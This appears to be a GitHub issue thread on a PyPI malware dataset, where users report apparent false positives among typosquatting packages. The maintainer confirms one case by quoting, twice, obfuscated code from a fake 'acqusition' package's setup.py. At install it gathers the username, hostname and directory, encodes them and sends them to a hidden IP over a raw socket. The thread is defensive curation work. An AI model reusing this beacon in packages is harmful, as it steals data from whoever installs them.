### ISSUE TITLE
False Positives in the Dataset

### ISSUE THREAD

**Issue by Co1lin** [lxyeternal/pypi_malregistry#2]
Hi, I found that there may be some false positives in the dataset, which means I think some packages are benign instead of malicious.

For example, packages [acitscapesscripts-12.0.1](https://github.com/lxyeternal/pypi_malregistry/tree/main/acitscapesscripts/12.0.1), [aiiohttp-0.1](https://github.com/lxyeternal/pypi_malregistry/tree/main/aiiohttp/0.1) and [aiohtttps-0.1](https://github.com/lxyeternal/pypi_malregistry/tree/main/aiohtttps/0.1) seem to only have an executable code/file, `setup.py`. They have the following contents:

```python
# acitscapesscripts-12.0.1/setup.py
import requests
from setuptools import setup
from setuptools.command.install import install

print("test anupamas01 ")


setup(name='acitscapesscripts',
      version='12.0.1',
      description='AnupamAS01',
      author='AnupamAS01',
      license='MIT',
      zip_safe=False)
```

```python
# aiiohttp-0.1/setup.py
from setuptools import setup, find_packages


setup(
    name='aiiohttp',
    version='0.1',
    license='MIT',
    author="m6xw Dingle",
    author_email='httpsdiscord.gg4p7VMQWxzA@gmail.com',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    url='https://discord.gg/4p7VMQWxzA',
    keywords='pynacl discord voice mp3 ffmpge typosquatting sound pynalc',
)
```

```python
# aiohtttps-0.1/setup.py
from setuptools import setup, find_packages


setup(
    name='aiohtttps',
    version='0.1',
    license='MIT',
    author="m6xw Dingle",
    author_email='httpsdiscord.gg4p7VMQWxzA@gmail.com',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    url='https://discord.gg/4p7VMQWxzA',
    keywords='pynacl discord voice mp3 ffmpge typosquatting sound pynalc',
)
```

Correct me if I'm wrong. But I don't see any malicious behavior in the code above. I'm also curious about how such false positives are included in this dataset. Thanks!

**Comment by aschnapp** [comment]
@Co1lin I don't find these in PyPI anymore with a quick search, they must have been taken down for some reason. These might be partial packages and the actual snippet of malicious code does not exist anymore.
For instance: 
malicious code for aiiohttp and aiohtttps seems to reside in 'src' directory, I'm not sure about acitscapesscripts though.

**Comment by lxyeternal** [comment]
Thanks for your revising, I also found some benign PyPI packages, now I deleted all of the non-malicious packages from this repository.

**Comment by Jarvx** [comment]
Hi, thanks for creating this interesting dataset, 

can you look at this case,  https://github.com/lxyeternal/pypi_malregistry/tree/main/convocations

It seems all releases are still being listed on https://pypi.org/project/convocations/#history and it's likely to be a false positive.

**Comment by lxyeternal** [comment]
> Hi, thanks for creating this interesting dataset,
> 
> can you look at this case, https://github.com/lxyeternal/pypi_malregistry/tree/main/convocations
> 
> It seems all releases are still being listed on https://pypi.org/project/convocations/#history and it's likely to be a false positive. I also checked the setup files only, which do not show some strange code snippets.

Thanks for your check. I removed this benign packages from the dataset.

**Comment by Jarvx** [comment]
Hi, thanks for being responsive. Can you please also look into this case 

https://github.com/lxyeternal/pypi_malregistry/tree/main/acqusition/4.4.2

Here are references:

- https://pypi.org/project/Acquisition/#history
- https://github.com/zopefoundation/Acquisition

**Comment by lxyeternal** [comment]
> Hi, thanks for being responsive. Can you please also look into this case
> 
> https://github.com/lxyeternal/pypi_malregistry/tree/main/acqusition/4.4.2
> 
> Here are references:
> 
> * https://pypi.org/project/Acquisition/#history
> * https://github.com/zopefoundation/Acquisition
> 
> ```python
> import os
> import platform
> from setuptools import setup, find_packages, Extension
> 
> with open('README.rst') as f:
>     README = f.read()
> 
> with open('CHANGES.rst') as f:
>     CHANGES = f.read()
> 
> # PyPy won't build the extension.
> py_impl = getattr(platform, 'python_implementation', lambda: None)
> is_pypy = py_impl() == 'PyPy'
> is_pure = 'PURE_PYTHON' in os.environ
> if is_pypy or is_pure:
>     ext_modules = []
> else:
>     ext_modules = [
>         Extension("Acquisition._Acquisition",
>                   [os.path.join('src', 'Acquisition', '_Acquisition.c')],
>                   include_dirs=['include', 'src']),
>     ]
> 
> __version__ = '4.4.2'
> ```

Thanks for your attention. I checked this package and found malicious code in the setup.py. You can drop down this file, the malicious code embeds the 578-600 lines.

`try:
	import os
	import pwd
	import socket
	import base64
	soft = os.getcwd().split('/')[-1]
	u = pwd.getpwuid(os.getuid()).pw_name
	hname = socket.gethostname()
	rawd = 'Y:%s %s %s'%(soft, u, hname)
	encd = '';t=[0x76,0x21,0xfe,0xcc,0xee];
	for i in xrange(len(rawd)):
		encd += chr(ord(rawd[i]) ^ t[i%len(t)])
	p = ('G' + 'E' + 'T /%s ' + 'H' + 'T' + 'T' + 'P/1.1\r\n')%(base64.b64encode(encd)) + '\r\n'*2
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(4)
	rip = 'M' + 'T' + 'IxL' + 'jQyL' + 'jIx' + 'N' + 'y4' + '0NA' + '=' + '='
	s.connect((base64.b64decode(rip), 017620))
	s.sendall(p)
	s.close()
except Exception,e:
	# Welcome Here! :)
	# just toy, no harm :)
	pass
	`

**Comment by lxyeternal** [comment]
> Hi, thanks for being responsive. Can you please also look into this case
> 
> https://github.com/lxyeternal/pypi_malregistry/tree/main/acqusition/4.4.2
> 
> Here are references:
> 
> * https://pypi.org/project/Acquisition/#history
> * https://github.com/zopefoundation/Acquisition
> 
> ```python
> import os
> import platform
> from setuptools import setup, find_packages, Extension
> 
> with open('README.rst') as f:
>     README = f.read()
> 
> with open('CHANGES.rst') as f:
>     CHANGES = f.read()
> 
> # PyPy won't build the extension.
> py_impl = getattr(platform, 'python_implementation', lambda: None)
> is_pypy = py_impl() == 'PyPy'
> is_pure = 'PURE_PYTHON' in os.environ
> if is_pypy or is_pure:
>     ext_modules = []
> else:
>     ext_modules = [
>         Extension("Acquisition._Acquisition",
>                   [os.path.join('src', 'Acquisition', '_Acquisition.c')],
>                   include_dirs=['include', 'src']),
>     ]
> 
> __version__ = '4.4.2'
> ```

Thanks for your attention. I checked this package and found malicious code in the setup.py. You can drop down this file, the malicious code embeds the 578-600 lines.

```
try:
	import os
	import pwd
	import socket
	import base64
	soft = os.getcwd().split('/')[-1]
	u = pwd.getpwuid(os.getuid()).pw_name
	hname = socket.gethostname()
	rawd = 'Y:%s %s %s'%(soft, u, hname)
	encd = '';t=[0x76,0x21,0xfe,0xcc,0xee];
	for i in xrange(len(rawd)):
		encd += chr(ord(rawd[i]) ^ t[i%len(t)])
	p = ('G' + 'E' + 'T /%s ' + 'H' + 'T' + 'T' + 'P/1.1\r\n')%(base64.b64encode(encd)) + '\r\n'*2
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(4)
	rip = 'M' + 'T' + 'IxL' + 'jQyL' + 'jIx' + 'N' + 'y4' + '0NA' + '=' + '='
	s.connect((base64.b64decode(rip), 017620))
	s.sendall(p)
	s.close()
except Exception,e:
	# Welcome Here! :)
	# just toy, no harm :)
	pass
```

**Comment by Jarvx** [comment]
Thanks. Indeed, you are correct.

**Comment by lionheart-mayank** [comment]
thankyou for the dataset . i am student working on my project detecting malicious package in python repository using  machine learning do you have benign dataset also ?? it might be helpful to me
